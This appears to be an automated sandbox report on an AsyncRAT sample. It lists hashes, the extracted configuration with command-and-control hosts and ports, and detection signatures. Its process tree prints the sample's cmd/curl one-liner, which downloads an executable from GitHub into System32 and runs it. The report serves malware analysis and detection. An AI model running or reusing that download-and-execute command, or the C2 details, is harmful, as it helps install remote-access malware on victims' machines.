Analysis
-
max time kernel
140s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
26-07-2024 03:59
Static task
static1
Behavioral task
behavioral1
Sample
7a976388b064594086b73e3e08a3b95b97a9eea7610bf9c4ac53a2d10304e12b.exe
Resource
win7-20240704-en
General
-
Target
7a976388b064594086b73e3e08a3b95b97a9eea7610bf9c4ac53a2d10304e12b.exe
-
Size
1.5MB
-
MD5
c630bf785cbddc841d851ba3ac942b46
-
SHA1
2f410b120f52038536f5126a773ccaeb6846c9c8
-
SHA256
7a976388b064594086b73e3e08a3b95b97a9eea7610bf9c4ac53a2d10304e12b
-
SHA512
fd8e9d471edb1d0ae1ad1ab6220af99d56f1d0dd5e93c10d0701525ed9a96b8e100f2762db8062e96be17a901bd186456c815e7df016cb2be25e0bebf8d32a7f
-
SSDEEP
24576:/+Kd7DDr9Ye1/aj1bx7yjtrE2/Ci2nCRvuGKFXZT1sUnM:/b/9fwxxuRbCPnHEU
Malware Config
Extracted
asyncrat
1.0.7
Default
127.0.0.1:2035
147.185.221.16:2035
147.185.221.19:2035
121637121.duckdns.org:2035
I8EJ82H739UG
-
delay
1
-
install
true
-
install_file
Update.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x00090000000233fd-2.dat family_asyncrat -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 4324 kerneldat234.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 raw.githubusercontent.com 4 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\Tasks\kerneldat234.exe curl.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3136 wrote to memory of 4188 3136 7a976388b064594086b73e3e08a3b95b97a9eea7610bf9c4ac53a2d10304e12b.exe 85 PID 3136 wrote to memory of 4188 3136 7a976388b064594086b73e3e08a3b95b97a9eea7610bf9c4ac53a2d10304e12b.exe 85 PID 4188 wrote to memory of 1908 4188 cmd.exe 86 PID 4188 wrote to memory of 1908 4188 cmd.exe 86 PID 4188 wrote to memory of 4324 4188 cmd.exe 90 PID 4188 wrote to memory of 4324 4188 cmd.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\7a976388b064594086b73e3e08a3b95b97a9eea7610bf9c4ac53a2d10304e12b.exe"C:\Users\Admin\AppData\Local\Temp\7a976388b064594086b73e3e08a3b95b97a9eea7610bf9c4ac53a2d10304e12b.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/Vane.cc-Skar-Fortnite-self-leak/main/um/AUTH/kdmapper.exe --output C:\Windows\System32\Tasks\kerneldat234.exe >nul 2>&1 && C:\Windows\System32\Tasks\kerneldat234.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\system32\curl.execurl https://raw.githubusercontent.com/SkarSys/Vane.cc-Skar-Fortnite-self-leak/main/um/AUTH/kdmapper.exe --output C:\Windows\System32\Tasks\kerneldat234.exe3⤵
- Drops file in System32 directory
PID:1908
-
-
C:\Windows\System32\Tasks\kerneldat234.exeC:\Windows\System32\Tasks\kerneldat234.exe3⤵
- Executes dropped EXE
PID:4324
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
48KB
MD5a64c195587c96e2d3dabe451e7ebb496
SHA156b34ea8794487287f4d13708c56e46012417e9b
SHA256f879d638d1ff0dd11471d38f62361315bb43b77d3605ec9ff67b149f435dadcc
SHA512b9b600898e094832cd598182002fddab9506166fc9104994651aa83b8c96f7339901fec258978ecaafce393ac6c453280ccf22061b40839703d1760a6f3108cd